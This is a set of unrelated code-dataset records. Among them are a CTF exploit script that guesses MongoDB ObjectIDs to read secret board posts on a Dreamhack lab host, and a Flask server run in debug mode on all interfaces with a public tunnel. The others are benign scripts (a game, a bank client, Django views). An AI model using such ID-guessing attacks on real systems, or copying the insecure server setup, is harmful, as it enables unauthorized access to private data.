(YR)
\n    if age_cod == \"SEC\":\n        age/=60\n        age_cod=\"MIN\"\n    if age_cod == \"MIN\":\n        age/=60\n        age_cod=\"HR\"\n    if age_cod == \"HR\":\n        age/=24\n        age_cod=\"DY\"\n    if age_cod == \"DY\":\n        age/=7\n        age_cod=\"WK\"\n    if age_cod == \"WK\":\n        age/=4\n        age_cod=\"MON\"\n    if age_cod == \"MON\":\n        age/=12\n        age_cod=\"YR\"\n    if age_cod == \"DEC\":\n        age*=10\n        age_cod=\"YR\"\n    if age_cod != \"YR\":\n        return None\n    # Age bucketing rules follow the table compiled on the website\n    if age < 0:  # 0 means the data exists but is implausible\n        return 0\n    if age < 1 :#Infant, Newborn\n        return 1\n    if age < 2 :#Infant\n        return 2\n    if age < 5 :#Child Preschool\n        return 3\n    if age < 12:#Child\n        return 4\n    if age < 18:#Adolescent\n        return 5\n    if age < 24:#Young Adult\n        return 6\n    if age < 44:#Adult\n        return 7\n    if age < 64:#Middle Aged\n        return 8\n    if age < 79:#Aged\n        return 9\n    if age < 123:#Aged+\n        return 10\n    return 0\n\ndef set_db_age_type(quarter):\n    \"\"\"Process one quarter at a time: add an AGE_TYPE column to DEMO and fill it from AGE and AGE_COD.\n    \"\"\"\n    data = {}\n    with pyodbc.connect(\"driver={SQL Server};server=localhost;Trusted_Connection=yes\", database=db_name) as con:\n        with con.cursor() as cursor:\n            row = cursor.execute(select_age.format(quarter))\n            for pid, age, age_type in row:  # first pull out the quarter's age values and units\n                try:\n                    data[pid] = (float(age), age_type.strip())\n                except:\n                    continue\n            print(\"{0} >> {1} records\".format(quarter, len(data)))\n            # add the AGE_TYPE column first if the table does not have one\n            columns = [c for c, in cursor.execute(get_columns.format(quarter))]\n            if \"AGE_TYPE\" not in columns:\n                cursor.execute(add_type_column.format(quarter))\n            # set AGE_TYPE\n            for pid in data:\n                age_type = get_age_type(data[pid])\n                if age_type:  # a value was returned\n                    cursor.execute(update_age_type.format(quarter, age_type, pid))\n                else:\n                    cursor.execute(update_age_type.format(quarter, \"NULL\", pid))\n            cursor.commit()\n\ndef main():\n    with pyodbc.connect(\"driver={SQL Server};server=localhost;Trusted_Connection=yes\", database=db_name) as con:\n        with con.cursor() as cursor:\n            tables = [t for t, in cursor.execute(\"SELECT TABLE_NAME FROM INFORMATION_SCHEMA.Tables;\") if \"DEMO\" in t]\n    tables.sort()\n    for quarter in tables:\n        set_db_age_type(quarter)\n\nif __name__ == \"__main__\":\n    print(time.asctime(time.localtime(time.time())))\n    main()\n    print(time.asctime(time.localtime(time.time())))\n","sub_path":"scripts/set_age_type.py","file_name":"set_age_type.py","file_ext":"py","file_size_in_byte":3458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"522350149","text":"class Board_game():\n    def __init__(self):\n        self.wins_coord = [(1, 2, 3), (4, 5, 6,), (7, 8, 9), (1, 4, 7), (2, 5, 8), (3, 6, 9), (1, 5, 9), (3, 5, 7)]\n        self.board = list(range(1, 10))\n\n\n    def draw_board(self):\n\n        print('-------------')\n        for i in range(3):\n            print('|', self.board[0 + i * 3], '|', self.board[1 + i * 3], '|', self.board[2 + i * 3], '|')\n        print('-------------')\n\n\n\n    def take_input(self, player_token):\n        while True:\n            value = input('Where to place: ' + player_token + '?')\n            if not (value in '123456789'):\n                print('Invalid input. Try again.')\n                continue\n            value = int(value)\n            if str(self.board[value - 1]) in 'xo':\n                print('That cell is already taken')\n                continue\n            self.board[value - 1] = player_token\n            break\n\n    def check_win(self):\n\n        for each in self.wins_coord:\n            if (self.board[each[0] - 1]) == (self.board[each[1] - 1]) == (self.board[each[2] - 1]):\n                return self.board[each[1] - 1]\n        else:\n            return False\n\n\n    def main(self):\n\n        counter = 0\n        while True:\n            self.draw_board()\n            if counter % 2 == 0:\n                self.take_input('x')\n            
else:\n                self.take_input('o')\n            if counter > 3:\n                winner = self.check_win()\n                if winner:\n                    self.draw_board()\n                    print(winner, \"wins!\")\n                    break\n            counter += 1\n            if counter > 8:\n                self.draw_board()\n                print('Draw!')\n                break\n\ng = Board_game()\ng.main()","sub_path":"крестики-нолики1.py","file_name":"крестики-нолики1.py","file_ext":"py","file_size_in_byte":1791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"174463185","text":"\"\"\"\r\nMIT License\r\n\r\nCopyright (c) 2021 Ali Fayaz (Quill) (quillfires)\r\n\r\nPermission is hereby granted, free of charge, to any person obtaining a copy\r\nof this software and associated documentation files (the \"Software\"), to deal\r\nin the Software without restriction, including without limitation the rights\r\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\r\ncopies of the Software, and to permit persons to whom the Software is\r\nfurnished to do so, subject to the following conditions:\r\n\r\nThe above copyright notice and this permission notice shall be included in all\r\ncopies or substantial portions of the Software.\r\n\r\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\r\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\r\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\r\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\r\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\r\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\r\nSOFTWARE.\r\n\"\"\"\r\nimport asyncio\r\nfrom asyncio import ensure_future, Future, iscoroutine\r\nfrom collections import defaultdict, OrderedDict\r\nfrom threading import Lock\r\nfrom .core.http import HTTPSession\r\nfrom .core.errors import *\r\n\r\n\r\nclass asyncBML():\r\n    def __init__(self, *, loop=None, username=None, password=None):\r\n        loop = loop or asyncio.get_event_loop()\r\n        self.http = HTTPSession(loop=loop, username=username, password=password)\r\n        self._events = defaultdict(OrderedDict)\r\n        self.transactions = []\r\n        self._loop = loop\r\n        self._lock = Lock()\r\n\r\n    async def close(self):\r\n        \"\"\"|coro|\r\n        Clear the session\r\n\r\n        \"\"\"\r\n        await self.http.close()\r\n\r\n    async def get_accounts(self):\r\n        \"\"\"|coro|\r\n\r\n        Method which retrieves all the accounts.\r\n\r\n        Returns\r\n        ---------\r\n        list: accounts\r\n            a list of dictionary objects containing all the accounts.\r\n            [{account1}, {account2}, {account3}]\r\n        \"\"\"\r\n        data = await self.http.get_all_accounts()\r\n        return data\r\n\r\n    def event(self, event, f=None):\r\n        \"\"\"Registers the function ``f`` to the event name ``event``.\r\n        If ``f`` isn't provided, this method returns a function that\r\n        takes ``f`` as a callback; in other words, you can use this method\r\n        as a decorator, like so:\r\n            @bank.event('new_transaction')\r\n            async def data_handler(data):\r\n                print(data)\r\n        In both the decorated and undecorated forms, the event handler is\r\n        returned. 
The upshot of this is that you can call decorated handlers\r\n        directly\r\n\r\n        Note\r\n        --------\r\n        Will fire all transactions from the last 24 hours when the app restarts.\r\n        Use a db to make sure that you aren't notified of the same transaction twice.\r\n        \"\"\"\r\n        def _on(f):\r\n            self._add_event_handler(event, f, f)\r\n            return f\r\n        if f is None:\r\n            return _on\r\n        else:\r\n            return _on(f)\r\n\r\n    def _add_event_handler(self, event, k, v):\r\n        self.emit('new_listener', event, k)\r\n        with self._lock:\r\n            self._events[event][k] = v\r\n\r\n    def _emit_handle_potential_error(self, event, error):\r\n        if event == 'error':\r\n            if error:\r\n                raise error\r\n            else:\r\n                raise ClientError(\"Uncaught, unspecified 'error' event.\")\r\n\r\n    def _call_handlers(self, event, args, kwargs):\r\n        handled = False\r\n        with self._lock:\r\n            funcs = list(self._events[event].values())\r\n        for f in funcs:\r\n            self._emit_run(f, args, kwargs)\r\n            handled = True\r\n        return handled\r\n\r\n    def emit(self, event, *args, **kwargs):\r\n        handled = self._call_handlers(event, args, kwargs)\r\n        if not handled:\r\n            self._emit_handle_potential_error(event, args[0] if args else None)\r\n        return handled\r\n\r\n    def _emit_run(self, f, args, kwargs):\r\n        try:\r\n            coro = f(*args, **kwargs)\r\n        except Exception as exc:\r\n            self.emit('error', exc)\r\n        else:\r\n            if iscoroutine(coro):\r\n                if self._loop:\r\n                    f = ensure_future(coro, loop=self._loop)\r\n                else:\r\n                    f = ensure_future(coro)\r\n            elif isinstance(coro, Future):\r\n                f = coro\r\n            else:\r\n                f = None\r\n\r\n            if f:\r\n                @f.add_done_callback\r\n                def _callback(f):\r\n                    if f.cancelled():\r\n                        return\r\n\r\n                    exc = f.exception()\r\n                    if exc:\r\n                        self.emit('error', exc)\r\n\r\n    async def get_contacts(self):\r\n        \"\"\"|coro|\r\n\r\n        Method which retrieves all the contacts.\r\n\r\n        Returns\r\n        ---------\r\n        list: contacts\r\n            a list of dictionary objects containing the details for each contact.\r\n            [{contact1}, {contact2}, {contact3}]\r\n\r\n        Raises\r\n        --------\r\n        ClientError\r\n            Bad request while fetching contacts.\r\n        HTTPException\r\n            Failed to login.\r\n        \"\"\"\r\n        data = await self.http.get_contacts()\r\n        return data\r\n    \r\n    async def add_contact(self, name=None, account=None):\r\n        \"\"\"|coro|\r\n\r\n        Method to add a contact.\r\n\r\n        Returns\r\n        ---------\r\n        dict: contact\r\n            a dictionary object of the added contact\r\n            {contact}\r\n\r\n        Raises\r\n        --------\r\n        MissingRequiredFields\r\n            Missing a required field (account number or name).\r\n        InvalidContent\r\n            Invalid account number.\r\n        ClientError\r\n            Bad request while fetching contacts.\r\n        HTTPException\r\n            Failed to login.\r\n        DuplicateContent\r\n            Account number is already saved in your contacts.\r\n            Along with the error message it will print \r\n            the name of the duplicate.\r\n        \"\"\"\r\n        data = await self.http.add_contact(name, account)\r\n        return data\r\n\r\n    async def delete_contact(self, account=None):\r\n        \"\"\"|coro|\r\n\r\n        Method to delete a contact.\r\n\r\n        Returns\r\n        ---------\r\n        str: notice\r\n            'Contact removed successfully'\r\n\r\n        Raises\r\n        --------\r\n        MissingRequiredFields\r\n            Missing the contact details (account number or name or id).\r\n        InvalidContent\r\n            Contact is not found in your list of contacts.\r\n        ClientError\r\n            Bad request while deleting contact.\r\n        HTTPException\r\n            Failed to login.\r\n        \"\"\"\r\n        data = await self.http.delete_contact(account)\r\n        return data\r\n\r\n    async def get_history(self) -> dict:\r\n        \"\"\"|coro|\r\n\r\n        Method which retrieves the account history.\r\n\r\n        Returns\r\n        ---------\r\n        
dict: transactions\r\n            Dictionary object containing transactions relating to each account.\r\n            {account1:{[{transaction1},{transaction2}]},account2:{[{transaction1},{transaction2}]},}\r\n\r\n            transaction:\r\n            {'date': 'date', 'sender': 'sender', 'amount': 'amount', 'minus': True/False, 'balance': 'uncleared amount', \r\n            'description': 'Type of transaction'}\r\n\r\n        Raises\r\n        --------\r\n        HTTPException\r\n            Bad request while fetching transactions.\r\n        \"\"\"\r\n        data = await self.http.get_history()\r\n        return data\r\n\r\n    async def start(self):\r\n        \"\"\"|coro|\r\n        An asynchronous call which starts the BML event loop.\r\n        Listen for new transactions using a decorator like:\r\n            @aiobmlclient.event('new_transaction')\r\n            async def data_handler(data):\r\n                print(data)\r\n\r\n        Note\r\n        --------\r\n        Will fire all transactions from the last 24 hours when the app restarts.\r\n        Use a db to make sure that you aren't notified of the same transaction twice.\r\n        \"\"\"\r\n        while True:\r\n            mybank = await self.http.get_history()\r\n            if mybank:\r\n                for accounts in mybank:\r\n                    for transaction in mybank[accounts]:\r\n                        transaction.pop('balance')\r\n                        if (transaction not in self.transactions):\r\n                            self.emit('new_transaction', transaction)\r\n                            self.transactions.append(transaction)\r\n            await asyncio.sleep(30)\r\n","sub_path":"aiobml/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":8653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"578153490","text":"from flask import Flask, render_template\nfrom pymavlink import mavutil\nfrom msgdef import *\nimport socket\nimport os\nimport threading\n\nHOST = '127.0.0.1' #Server IP address\nPORT = 65432 #Server port\nfirstTime = True #Indicates whether it's the first time server() is called\ndata_view = \"\"\"\"\"\" #Store data to view on webpage\nbufferSize = 512\n\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n    return render_template('index.html')\n\n@app.route('/init')\ndef init():\n    server()\n\n@app.route('/data')\ndef data():\n    return f\"\"\"\"\"\"+ data_view +''\n\n@app.errorhandler(404)\ndef page_not_found(e):\n    return render_template('404.html'), 404\n\ndef server():\n    global data_view\n    global firstTime\n\n    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) #Create a UDP socket\n    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) #Allow socket to reuse port\n    s.bind((HOST, PORT)) #Bind socket to port\n\n    sensorConnection = mavutil.mavlink_connection('udpin:localhost:14540') #Create a MAVLink connection to receive sensor data\n\n    if firstTime:\n        # Indicating the server has started\n        print(\"Server started, waiting for clients to connect\")\n        firstTime = False\n    receiveDataAndSendActuatorSignal(sensorConnection, s) \n\ndef receiveDataAndSendActuatorSignal(mavlink, socket):\n    global data_view\n\n    with socket:\n        while True:\n            try:\n                data, addr = socket.recvfrom(bufferSize) #Receive UDP client port\n            except:\n                data = b''\n            if len(data) != 0: #Checks if UDP client is connected\n                imu_msg = mavlink.recv_match(type='HIGHRES_IMU', blocking=True, timeout = 0.001) #Receive sensor data through MAVLink\n                if imu_msg == None:\n                    continue #Restart loop if no data is received \n                print(imu_msg)\n\n                actuatorSignal = imu_msg.xacc * 1.5 #Generate some actuator signal\n                encodedData = str(actuatorSignal).encode('utf-8') # Encoding the signal\n                socket.sendto(encodedData, addr) # Send the byte stream to client\n\n                data_view = f'''
Actuator Signal: {actuatorSignal}\n X Acceleration: {imu_msg.xacc}\n\n Y Acceleration: {imu_msg.yacc}\n Z Acceleration: {imu_msg.zacc}\n\n X Gyro: {imu_msg.xgyro}\n Y Gyro: {imu_msg.ygyro}\n\n Z Gyro: {imu_msg.zgyro}\n 
''' + data_view\n\ndef url():\n    os.system('cmd /k \"lt --port 5000\"')\n\nif __name__ == '__main__':\n    threading.Thread(target=url).start() #Start local tunnel\n    app.run(debug=True, host='0.0.0.0') #Build the Flask app","sub_path":"UDP MAVLink Server/serverPi.py","file_name":"serverPi.py","file_ext":"py","file_size_in_byte":2732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"286720917","text":"\"\"\"\nRank related code\n\"\"\"\n\nfrom scipy.stats import rankdata\n\n\ndef rank_artists(data, ranks, age_range=None, distances=None):\n    \"\"\"\n    Ranks artists based on different criteria.\n    @param distances: distances to film set calculated for all artists\n    @param age_range: tuple with the age range the artists have been filtered by\n    @param ranks: string containing requested ranks\n    @param data: Artists data\n    \"\"\"\n    all_ranks = []\n    try:\n        for rank in ranks.split(','):\n            rank_key, unused_, weight = rank.partition(':')\n            if rank_key == 'age':\n                if age_range:\n                    middle_age_range = age_range[0] + ((age_range[1] - age_range[0]) / 2.0)\n                else:\n                    ages = [a['age'] for a in data['artists']]\n                    min_age = min(ages)\n                    max_age = max(ages)\n                    middle_age_range = min_age + (max_age - min_age) / 2.0\n                r = rankdata([abs(middle_age_range - a[rank_key]) for a in data['artists']])\n            elif rank_key == 'distance':\n                r = rankdata([distances[a['uuid']] for a in data['artists']])\n            else:\n                r = rankdata([a[rank_key] for a in data['artists']])\n            if weight:\n                try:\n                    weight = float(weight)\n                except ValueError:\n                    raise TypeError('Wrong rank requested!')\n                r = [e * weight for e in r]\n            all_ranks.append(r)\n    except KeyError:\n        raise TypeError('Wrong rank requested!')\n    else:\n        ranks = {r[0]: sum(r[1:]) for r in zip((a['uuid'] for a in data['artists']), *all_ranks)}\n        data['artists'].sort(key=lambda x: ranks[x['uuid']])\n","sub_path":"the_artist/rank.py","file_name":"rank.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"28492708","text":"#!/bin/python\n\n# This is a program to calculate a buy range for a proper buy point.\n# It adds 5% to the proper buy point.\n\n\ndef stkData():\n    ni = i.upper()\n    b = input('Buy point? ')\n    t = float(b) * 1.05\n    t = round(t, 2)\n    print(str(i) + ' -- ' + str(b) + ' -- ' + str(t))\n    txt = str(ni) + ' -- ' + str(b) + ' -- ' + str(t)\n    f.write(str(txt))\n    f.write(\"\\n\")\n    f.write(\"\\n\")\n\n\nf = open(\"/home/sot/Desktop/buyRange.txt\", \"a\")\nwhile True:\n    i = input('Symbol? ')\n    if i == '':\n        f.close()\n        break\n    stkData()\n","sub_path":".local/bin/buyRange.py","file_name":"buyRange.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"90380195","text":"import requests, string, itertools\n\n# mongodb object id rule\n# 4byte(timestamp) + 5byte(machine based random) + 3byte(index count)\n# guess available for timestamp, indexcount\n\n# api/board/:query_no doesn't check if it's secret(READ CODE!!)\npost_1 = '64 11 5d 59 c30c6c4f03 502e1c'\npost_2 = '64 11 5d 5e c30c6c4f03 502e1d'\npost_4 = '64 11 5d 61 c30c6c4f03 502e1f'\n\nalpha_nums = list(string.ascii_lowercase + string.digits)\nperms = itertools.permutations(alpha_nums, 2)\n\n# for i in perms:\nfor i in ['5f', '60']:\n    query_no = f'64115d{i}c30c6c4f03502e1e'\n    res = requests.get(f'http://host3.dreamhack.games:12830/api/board/{query_no}')\n    print(f'{query_no} : {res.status_code}')\n    print(res.content)","sub_path":"web_hacking/problems/lv1-mongoboard/exploit.py","file_name":"exploit.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"342115225","text":"# Use the probability(hand, deck) function in this file \r\n# to calculate the probability of getting a certain hand \r\n# given a randomly shuffled deck.\r\n\r\n# The main() function in this file\r\n# computes the probability of getting all possible hands\r\n# given a randomly shuffled deck containing 7 copper and 3 estate.\r\n\r\n# Michael Chu\r\n# 5/22/20\r\n\r\nimport math\r\n\r\nHANDSIZE = 5\r\n\r\n# Returns the number of spots left in the hand we're trying to build (given a certain base b)\r\ndef spotsLeft(b):\r\n    spots = HANDSIZE\r\n    for n in b.values():\r\n        spots = spots - n\r\n    return spots\r\n\r\n# Calculates n choose r\r\ndef nCr(n,r):\r\n    f = math.factorial\r\n    return f(n)/(f(r)*f(n-r))\r\n\r\n# Calculates the number of cards in deck d\r\ndef nCards(d):\r\n    count = 0\r\n    for n in d.values():\r\n        count += n\r\n    return count\r\n\r\n# Returns all possible hands of 5 cards given a certain base and a certain deck\r\ndef hands(deck,base={}):\r\n    # Makes copies so as to not disturb the originals\r\n    d = deck.copy()\r\n    b = base.copy()\r\n\r\n    # If the deck is empty, return base (as long as it is a valid hand)\r\n    if len(d)==0:\r\n        spots = spotsLeft(b)\r\n        if spots > 0:\r\n            return []\r\n        elif spots == 0:\r\n            return [b]\r\n        else:\r\n            return [\"INVALID HAND\"]\r\n\r\n    # Otherwise... 
Pick a card type from the deck \r\n cardType = list(d)[0]\r\n amount = d[cardType]\r\n \r\n # Update the deck\r\n del d[cardType]\r\n\r\n # Figure out how many spots in the hand are left\r\n spots = spotsLeft(b)\r\n\r\n # Generate hands with i of the card type\r\n handList = []\r\n for i in range(0,min(spots,amount)+1):\r\n b[cardType] = i\r\n handList += hands(d,b)\r\n\r\n return handList\r\n\r\n# Calculates probability of getting a certain hand given a randomly shuffled deck\r\ndef probability(hand,deck):\r\n successes = 1\r\n for card,amount in hand.items(): \r\n successes = successes*nCr(deck[card],amount)\r\n possible = nCr(nCards(deck),5)\r\n\r\n prob = successes/possible\r\n return prob\r\n\r\ndef main():\r\n deck = {\"copper\":7,\r\n \"estate\":3}\r\n print(\"Deck: \",deck)\r\n print()\r\n\r\n possibleHands = hands(deck)\r\n print(\"Possible Hands:\")\r\n print(possibleHands)\r\n print()\r\n\r\n print(\"Probabilities:\")\r\n probabilities = {}\r\n for hand in possibleHands:\r\n prob = probability(hand,deck)\r\n print(hand,prob)\r\n probabilities[tuple(hand.items())] = prob\r\n print()\r\n print(probabilities)\r\n print()\r\n\r\n sum = 0\r\n for prob in probabilities.values():\r\n sum += prob\r\n print(\"Sum of Probabilities: \",sum)\r\n\r\nmain()\r\n","sub_path":"probabilities.py","file_name":"probabilities.py","file_ext":"py","file_size_in_byte":2632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"278435494","text":"from flask import current_app as app\n\n@app.route('/HOOK',methods = ['POST','GET'])\ndef webhook():\n\tif request.method == \"POST\":\n\t\tupdate = telegram.Update.de_json(request.get_json(force=True),bot)\n\t\tdispatcher.process_update(update)\n\t\tupdate_queue.put(update)\n\t\treturn \"OK\"\n\telse:\n\t\treturn \"You are browser!\"\n\n\n\n#Set_webhook\n@app.route('/set_webhook', methods = ['GET', 'POST'])\ndef set_webhook():\n\ts = bot.setWebhook('https://%s:443/HOOK' % URL, certificate = open('/etc/ssl/admin/server.crt','rb'))\n\tif s:\n\t\tprint(s)\n\t\treturn \"webhook setup ok\"\n\telse:\n\t\treturn \"webhook setup failed\"\n \n \n","sub_path":"bot/application-bot/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"61598553","text":"from random import randint\nfrom time import sleep\nfrom operator import itemgetter\njogo = {'jogador1': randint(1, 6),\n 'jogador2': randint(1, 6),\n 'jogador3': randint(1, 6),\n 'jogador4': randint(1, 6)}\nprint('- ' * 20)\nranking = []\nsleep(1)\nfor k, v in jogo.items():\n print(f'{k} jogou {v} no dado.')\n sleep(1)\nprint('- ' * 20)\nranking = sorted(jogo.items(), key=itemgetter(1), reverse=True)\nfor i, d in enumerate(ranking):\n print(f'{i + 1}º lugar: {d[0]} com {d[1]}')\n","sub_path":"Desafios/des091a.py","file_name":"des091a.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"264498547","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom .forms import BookingForm\nfrom django.contrib import messages\nfrom .models import Booking\nfrom django.core.urlresolvers import reverse\n\ndef booking_create(request):\n form = BookingForm(request.POST or None)\n if form.is_valid():\n instance = form.save(commit=False)\n instance.user = request.user\n instance.save()\n 
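# --- Added note (not part of the original record): a hand-checkable case for the
# probability(hand, deck) helper in the record above. Drawing 5 coppers from the
# 7 copper / 3 estate deck is C(7,5)*C(3,0)/C(10,5) = 21*1/252 = 1/12 ~ 0.0833,
# so probability({'copper': 5, 'estate': 0}, {'copper': 7, 'estate': 3}) should
# return roughly 0.0833. Kept as comments only to avoid disturbing the Django
# view body this note sits between.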
messages.success(request, \"successfully created\")\n        return redirect(instance.get_absolute_url())\n    else:\n        messages.error(request, \"Not Successfully Created\")\n    context = {\n        \"form\": form,\n    }\n    return render(request, 'booking/form.html', context)\n\ndef booking_detail(request, id):\n    instance = get_object_or_404(Booking, id=id)\n    context = {\n        \"title\": instance.title,\n        \"instance\": instance,\n    }\n    return render(request, 'booking/detail.html', context)\n\ndef booking_list(request):\n    queryset = Booking.objects.all()\n    context = {\n        \"object_list\": queryset,\n        \"title\": \"List\"\n    }\n    return render(request, 'booking/list.html', context)\n\ndef booking_edit(request, id):\n    instance = get_object_or_404(Booking, id=id)\n    form = BookingForm(request.POST or None)\n    if form.is_valid():\n        instance = form.save(commit=False)\n        instance.save()\n        messages.success(request, \"Item Saved\", extra_tags='html_safe')\n        return redirect(instance.get_absolute_url())\n\n    context = {\n        \"id\": instance.id,\n        \"instance\": instance,\n        \"form\": form,\n    }\n    return render(request, \"\", context)\n\ndef booking_delete(request, id):\n    instance = get_object_or_404(Booking, id=id)\n    instance.delete()\n    messages.success(request, \"Successfully deleted\")\n    return redirect(\"booking:list\")","sub_path":"booking/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"124135042","text":"# from openvino.inference_engine import IENetwork, IEPlugin\nimport numpy as np\nimport cv2\nimport time\nimport sys\nimport argparse\nimport imutils\nimport time\nimport cv2\nimport os\nimport glob\nfrom tqdm import tqdm\n# use the sort module for real-time tracking\nfrom sort import *\n\ncam_w = 320\ncam_h = 240\nimage_size = 416\n\n# w, h for rescaling to fit the cam size\nnew_w = int(cam_w * min(image_size/cam_w, image_size/cam_h))\nnew_h = int(cam_h * min(image_size/cam_w, image_size/cam_h))\n\nxml_path = '/home/pi/workspace/IR/tiny-yolov3.xml'\nbin_path = '/home/pi/workspace/IR/tiny-yolov3.bin'\n\nLABELS = (\"person\", \"bicycle\", \"car\", \"motorbike\", \"aeroplane\",\n          \"bus\", \"train\", \"truck\", \"boat\", \"traffic light\",\n          \"fire hydrant\", \"stop sign\", \"parking meter\", \"bench\", \"bird\",\n          \"cat\", \"dog\", \"horse\", \"sheep\", \"cow\",\n          \"elephant\", \"bear\", \"zebra\", \"giraffe\", \"backpack\",\n          \"umbrella\", \"handbag\", \"tie\", \"suitcase\", \"frisbee\",\n          \"skis\", \"snowboard\", \"sports ball\", \"kite\", \"baseball bat\",\n          \"baseball glove\", \"skateboard\", \"surfboard\",\"tennis racket\", \"bottle\",\n          \"wine glass\", \"cup\", \"fork\", \"knife\", \"spoon\",\n          \"bowl\", \"banana\", \"apple\", \"sandwich\", \"orange\",\n          \"broccoli\", \"carrot\", \"hot dog\", \"pizza\", \"donut\",\n          \"cake\", \"chair\", \"sofa\", \"pottedplant\", \"bed\",\n          \"diningtable\", \"toilet\", \"tvmonitor\", \"laptop\", \"mouse\",\n          \"remote\", \"keyboard\", \"cell phone\", \"microwave\", \"oven\",\n          \"toaster\", \"sink\", \"refrigerator\", \"book\", \"clock\",\n          \"vase\", \"scissors\", \"teddy bear\", \"hair drier\", \"toothbrush\")\n\n# create the network\n# net = IENetwork(model = xml_path,weights = bin_path)\n\n# device (MYRIAD : NCS2)\n# plugin = IEPlugin(device='MYRIAD')\n# exec_net = plugin.load(net)\n\n# cam on/cam setting\ncam = cv2.VideoCapture(0)\ncam.set(cv2.CAP_PROP_FPS, 30)\ncam.set(cv2.CAP_PROP_FRAME_WIDTH, cam_w)\ncam.set(cv2.CAP_PROP_FRAME_HEIGHT, cam_h)\n\nwhile(True) :\n    # frame preprocessing\n    ret, frame = cam.read()\n    resized_image = cv2.resize(frame, (image_size, image_size), interpolation=cv2.INTER_CUBIC)\n\n    # pad with 128\n    canvas = np.full((image_size, image_size, 3), 128)\n    canvas[(image_size - new_h) // 2:(image_size - new_h) // 2 + new_h, (image_size - new_w) // 2:(image_size - new_w) // 2 + new_w, :] = resized_image\n\n    prepimg = canvas\n\n    prepimg = resized_image[np.newaxis, :, :, :] # Batch size axis add\n    prepimg = prepimg.transpose((0, 3, 1, 2)) # NHWC to NCHW\n\n    start = time.time()\n\n    cv2.imshow('image', prepimg)\n    # inference\n    # res = exec_net.infer({'inputs': prepimg})\n\n    end = time.time()\n\n    print('inference time : ', end - start)\n\n\n\n    k = cv2.waitKey(10) & 0xFF\n    if k == 27:\n        
break\n\ncam.release()\ncv2.destroyAllWindows()\n\n\n\n","sub_path":"openvino.py","file_name":"openvino.py","file_ext":"py","file_size_in_byte":2780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"329179178","text":"# -*- coding: utf-8 -*-\n#\n# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n# \n# http://www.apache.org/licenses/LICENSE-2.0\n# \n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations\n# under the License.\n#\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport os\nimport time\nimport random\n\nfrom sqlalchemy import event, exc, select\n\nfrom airflow.utils.log.logging_mixin import LoggingMixin\n\nlog = LoggingMixin().log\n\n\ndef setup_event_handlers(\n engine,\n reconnect_timeout_seconds,\n initial_backoff_seconds=0.2,\n max_backoff_seconds=120):\n\n @event.listens_for(engine, \"engine_connect\")\n def ping_connection(connection, branch):\n \"\"\"\n Pessimistic SQLAlchemy disconnect handling. Ensures that each\n connection returned from the pool is properly connected to the database.\n\n http://docs.sqlalchemy.org/en/rel_1_1/core/pooling.html#disconnect-handling-pessimistic\n \"\"\"\n if branch:\n # \"branch\" refers to a sub-connection of a connection,\n # we don't want to bother pinging on these.\n return\n\n start = time.time()\n backoff = initial_backoff_seconds\n\n # turn off \"close with result\". This flag is only used with\n # \"connectionless\" execution, otherwise will be False in any case\n save_should_close_with_result = connection.should_close_with_result\n\n while True:\n connection.should_close_with_result = False\n\n try:\n connection.scalar(select([1]))\n # If we made it here then the connection appears to be healty\n break\n except exc.DBAPIError as err:\n if time.time() - start >= reconnect_timeout_seconds:\n log.error(\n \"Failed to re-establish DB connection within %s secs: %s\",\n reconnect_timeout_seconds,\n err)\n raise\n if err.connection_invalidated:\n log.warning(\"DB connection invalidated. Reconnecting...\")\n\n # Use a truncated binary exponential backoff. Also includes\n # a jitter to prevent the thundering herd 